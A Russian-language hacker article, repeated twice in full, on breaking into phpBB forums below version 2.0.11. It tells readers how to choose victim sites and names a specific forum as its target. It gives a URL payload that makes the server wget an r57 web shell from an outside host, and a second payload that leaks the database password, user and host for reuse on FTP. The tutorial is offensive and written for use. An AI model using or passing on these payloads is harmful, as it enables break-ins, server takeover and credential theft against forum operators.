И вновь мы ломаем форум.
Сейчас я расскажу об багах одного из самых популярных в России(и не только) форума на одном из самых дырявых даижков:PHPBb. Щас я расскажу как ломать форумы PHPBB(любой версии ниже 2.0.11 но выше 2.0.0) Я выбрал баги в более новых версиях, потому что про старые рассказывать не интересно(не на чем попрактиковаться). Сначало выберем "жертву". Не выбирайте жертву набирая в поисковике чтото вроде "powered by PHPBB", так как все что там можно было найти при помощи поисковиков уже было взломано мной или другими не менее заинтересованными лицами(во, сказал). Если короче, то вам остается расчитывать только на форумы, которые не занесены в поисковую систему по строчке "powered by PHPBB". Узнать такой форум можно по строке(опять) "Powered By PHPbb" и большому значку(не всегда он там есть) "PHPBB" в топе форума. Как кто-то может быть заметил я буду описывать(несложно догадаться) SQL Injection
Ну так вот я выбрал http:www.casinojapan.net/phpbb/
Формипуем запрос(тоьлко не надо спрашивать "как?"-книжки читать нада)такого вида:
viewtopic.php?xxx=wget%20http://www.http://www.italylink.com/store/cart/catalog/
images/winux/r57.php&t=69&highlight=%2527.system($_GET[xxx]).include%2527 таким образом мы закачиваем в папку форума скрипт, который является веб-шеллом. Ну в общем потом его запускаем и всем управляем.
=================================================
Бага номер 2:
Бага это опять(кричим хором!) SQL INJECTION
Это в общем старая бага, но она по новому используется.
Пример такой:http://ссылка на форум/viewtopic.php?p=номер поста&highlight=%2527.$poster=$dbpasswd.%2527 - это дает пасс на базу данных если изменить параметр dbpasswd на dbuser или dbhost то получим соответственно имя пользователя и хост на котором база лежит. Но помня, что пасс на базу часто подходит и на фтп, мы догадываемся, что можно сделать.Правда?...
Ну вот в общем-то и все удачи всем. Правда такие форумы почти(почти!!!!) запатчили.
Советую использовать второй баг так как он хорошо изучен и надежен
=================================================
article by c31337
Сейчас я расскажу об багах одного из самых популярных в России(и не только) форума на одном из самых дырявых даижков:PHPBb. Щас я расскажу как ломать форумы PHPBB(любой версии ниже 2.0.11 но выше 2.0.0) Я выбрал баги в более новых версиях, потому что про старые рассказывать не интересно(не на чем попрактиковаться). Сначало выберем "жертву". Не выбирайте жертву набирая в поисковике чтото вроде "powered by PHPBB", так как все что там можно было найти при помощи поисковиков уже было взломано мной или другими не менее заинтересованными лицами(во, сказал). Если короче, то вам остается расчитывать только на форумы, которые не занесены в поисковую систему по строчке "powered by PHPBB". Узнать такой форум можно по строке(опять) "Powered By PHPbb" и большому значку(не всегда он там есть) "PHPBB" в топе форума. Как кто-то может быть заметил я буду описывать(несложно догадаться) SQL Injection
Ну так вот я выбрал http:www.casinojapan.net/phpbb/ Формипуем запрос(тоьлко не надо спрашивать "как?"-книжки читать нада)такого вида:
viewtopic.php?xxx=wget%20http://www.http://www.italylink.com/store/cart/catalog/
images/winux/r57.php&t=69&highlight=%2527.system($_GET[xxx]).include%2527 таким образом мы закачиваем в папку форума скрипт, который является веб-шеллом. Ну в общем потом его запускаем и всем управляем.
=================================================
Бага номер 2:
Бага это опять(кричим хором!) SQL INJECTION
Это в общем старая бага, но она по новому используется.
Пример такой:http://ссылка на форум/viewtopic.php?p=номер поста&highlight=%2527.$poster=$dbpasswd.%2527 - это дает пасс на базу данных если изменить параметр dbpasswd на dbuser или dbhost то получим соответственно имя пользователя и хост на котором база лежит. Но помня, что пасс на базу часто подходит и на фтп, мы догадываемся, что можно сделать.Правда?...
Ну вот в общем-то и все удачи всем. Правда такие форумы почти(почти!!!!) запатчили.
Советую использовать второй баг так как он хорошо изучен и надежен
=================================================
article by c31337
